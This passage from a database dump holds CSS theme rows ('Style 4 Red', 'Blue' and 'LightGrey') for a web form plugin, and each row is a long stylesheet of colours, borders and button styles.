#000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #000 !important;\nbackground-color:#FFD79C !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #000 !important;\nbackground-color:#FFD79C !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #000 !important;\nbackground-color:#FFD79C !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}', 0),
(23, 'Style 4 Red', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#C91B24 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#000000 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #C91B24 !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #C91B24 !important;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #C91B24 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#C91B24 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#000000 !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #C91B24 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#000000 !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#C91B24 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #fff !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #fff !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #C91B24 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor:  #fff !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}', 0),
(24, 'Style 4 Blue', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px ;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#46BBDE !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#F79647 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #46BBDE !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #46BBDE !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #46BBDE !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#46BBDE !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#F79647 !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder-radius: 0px !important;\nbox-shadow: 2px 2px 4px 0px #F79647 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nbackground-color:#fff !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#46BBDE !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #46BBDE !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image:url([SITE_ROOT]/images/button3.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}', 0),
(25, 'Style 4 LightGrey ', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 6px solid #fff !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#E7E7E7 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\nborder:1px solid #4AB9F1 !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#4AB9F1 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: #E7E7E7 !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#999 !important;\nfont-style:italic !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #E7E7E7 !important;\n}\n.input_active\n{\ncolor:#000 !important;\nfont-style:normal !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #E7E7E7 !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nborder: 1px solid #999 !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #E7E7E7 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#E7E7E7 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #999 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#5EA3CC !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #E7E7E7 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#5EA3CC !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; 